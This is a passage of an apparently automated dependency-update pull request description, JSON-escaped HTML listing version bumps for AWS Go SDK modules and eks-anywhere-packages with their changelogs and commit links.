href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.23\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-05-04)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudwatch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/cloudwatch/CHANGELOG.md#v1260-2023-05-04\"\u003ev1.26.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds support for filtering by metric names in CloudWatch Metric Streams.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/configservice\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/configservice/CHANGELOG.md#v1320-2023-05-04\"\u003ev1.32.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated ResourceType enum with new resource types onboarded by AWS Config in April 2023.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/connect/CHANGELOG.md#v1541-2023-05-04\"\u003ev1.54.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Remove unused InvalidParameterException from CreateParticipant API\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ecs/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Documentation update for new error type NamespaceNotFoundException for CreateCluster and UpdateCluster\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1280-2023-05-04\"\u003ev1.28.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for the Suricata REJECT option in midstream exception configurations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1170-2023-05-04\"\u003ev1.17.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: DescribeDomainNodes: A new API that provides configuration information for nodes part of the domain\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/quicksight/CHANGELOG.md#v1350-2023-05-04\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Topic, Dataset parameters and VPC\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/rekognition/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new attribute FaceOccluded. Additionally, you can now select attributes individually (e.g. [\u0026quot;DEFAULT\u0026quot;, \u0026quot;FACE_OCCLUDED\u0026quot;, \u0026quot;AGE_RANGE\u0026quot;] instead of [\u0026quot;ALL\u0026quot;]), which can reduce response time.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/s3\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/s3/CHANGELOG.md#v1331-2023-05-04\"\u003ev1.33.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Documentation updates for Amazon S3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sagemaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sagemaker/CHANGELOG.md#v1770-2023-05-04\"\u003ev1.77.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: We added support for ml.inf2 and ml.trn1 family of instances on Amazon SageMaker for deploying machine learning (ML) models for Real-time and Asynchronous inference. You can use these instances to achieve high performance at a low cost for generative artificial intelligence (AI) models.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/securityhub\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/securityhub/CHANGELOG.md#v1310-2023-05-04\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Finding History.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sqs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sqs/CHANGELOG.md#v1210-2023-05-04\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release enables customers to call SQS using AWS JSON-1.0 protocol.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-03)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/appsync\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/appsync/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Private API support for AWS AppSync. With Private APIs, you can now create GraphQL APIs that can only be accessed from your Amazon Virtual Private Cloud (\u0026quot;VPC\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ec2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ec2/CHANGELOG.md#v1960-2023-05-03\"\u003ev1.96.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds an SDK paginator for GetNetworkInsightsAccessScopeAnalysisFindings\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/inspector2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/inspector2/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This feature provides deep inspection for linux based instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/iottwinmaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/iottwinmaker/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a field for GetScene API to return error code and message from dependency services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1270-2023-05-03\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Network Firewall now supports policy level HOME_NET variable overrides.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1160-2023-05-03\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Amazon OpenSearch Service adds the option to deploy a domain across multiple Availability Zones, with each AZ containing a complete copy of data and with nodes in one AZ acting as a standby. This option provides 99.99% availability and consistent performance in the event of infrastructure failure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/wellarchitected\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/wellarchitected/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release deepens integration with AWS Service Catalog AppRegistry to improve workload resource discovery.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-02)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ae835ecd4db83e5aff241520ec643afba522d704\"\u003e\u003ccode\u003eae835ec\u003c/code\u003e\u003c/a\u003e Release 2023-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef7f367760339dbf8f4bb7c81dbb86b1561b3a9e\"\u003e\u003ccode\u003eef7f367\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a62e494fe82709dd82ae4ce6d5a5a6a45287c45a\"\u003e\u003ccode\u003ea62e494\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833592fbe1a37f1cfd8b7b7062473c7cc6a97859\"\u003e\u003ccode\u003e833592f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/829131feddac6a2fa54ea0050ed7d8c97a29cdd7\"\u003e\u003ccode\u003e829131f\u003c/code\u003e\u003c/a\u003e Add SQSCustomizations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2108\"\u003e#2108\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9d08e7dc2f051ac9c83deca2c548c1d4c3373cdb\"\u003e\u003ccode\u003e9d08e7d\u003c/code\u003e\u003c/a\u003e Release 2023-05-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cec4d55d05fbd0bddff916f426901097073068a6\"\u003e\u003ccode\u003ecec4d55\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f558c81e77f42988da4fe0d0aee4be0294a50a8b\"\u003e\u003ccode\u003ef558c81\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8d2e554da1d221c2c1a541a78c729a3f564e8849\"\u003e\u003ccode\u003e8d2e554\u003c/code\u003e\u003c/a\u003e Release 2023-05-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/312e442dc8e12c6cb311e8ac5fcb5560eb4bcee1\"\u003e\u003ccode\u003e312e442\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.300.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dc2d13fa6f1db25f1c6d804567e1ecfcdff4f040\"\u003e\u003ccode\u003edc2d13f\u003c/code\u003e\u003c/a\u003e Release 2026-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/da4bcffa913dc4ba46e1ce10a6268bf075547a8d\"\u003e\u003ccode\u003eda4bcff\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a8b1180254cba3e23aa6baece26783395e884d81\"\u003e\u003ccode\u003ea8b1180\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a7078055860a55b00b76d6405baaa3f4f27094a5\"\u003e\u003ccode\u003ea707805\u003c/code\u003e\u003c/a\u003e Release 2026-05-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/657bacf7f10746f434840a3d734e9e2895a84098\"\u003e\u003ccode\u003e657bacf\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/29b6d377e2ecb35afe2b2f81914f62f33b6e8482\"\u003e\u003ccode\u003e29b6d37\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2328c4178cc3a828ada0e914dcba16b23eb548c6\"\u003e\u003ccode\u003e2328c41\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/83b34eacc84bae944779445d005bd25eb111fc25\"\u003e\u003ccode\u003e83b34ea\u003c/code\u003e\u003c/a\u003e Release 2026-04-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6eecf01d048da426be6809b82ee740e0bf21858\"\u003e\u003ccode\u003ef6eecf0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3cca141ddf7d9e6ad796eec7c3395f0f0714bba8\"\u003e\u003ccode\u003e3cca141\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.300.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bd153c05150d0c3f9d45f5b9353c34df9bab5b5\"\u003e\u003ccode\u003e9bd153c\u003c/code\u003e\u003c/a\u003e Release 2025-03-04.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b967446708e597c3c22c658d8399d11accc9e1f1\"\u003e\u003ccode\u003eb967446\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/188c52a1f53d95e7f99ce0edc73059ce5d0b803c\"\u003e\u003ccode\u003e188c52a\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/defaf5c13afed6bb77e2ee4fafea2bfcd09cea88\"\u003e\u003ccode\u003edefaf5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8f2dd23c2630bd2ee667a403cf8ea8611c5ce406\"\u003e\u003ccode\u003e8f2dd23\u003c/code\u003e\u003c/a\u003e add test that verifies SRA order of operations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3d547b010751de5a834a749ffdaddff4bcb0d39c\"\u003e\u003ccode\u003e3d547b0\u003c/code\u003e\u003c/a\u003e Release 2025-03-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/554a1497dc16d385e62514b10bc8adacfbd6a8d0\"\u003e\u003ccode\u003e554a149\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3abb221732b42d61c95f5306f528cc2182d37c7a\"\u003e\u003ccode\u003e3abb221\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/95ae39d57f8d986f691754737311102335039848\"\u003e\u003ccode\u003e95ae39d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c62ec38df6cc8e66ecf014365d8bd15c2599bc6d\"\u003e\u003ccode\u003ec62ec38\u003c/code\u003e\u003c/a\u003e create kitchen sink test service (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.57.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression 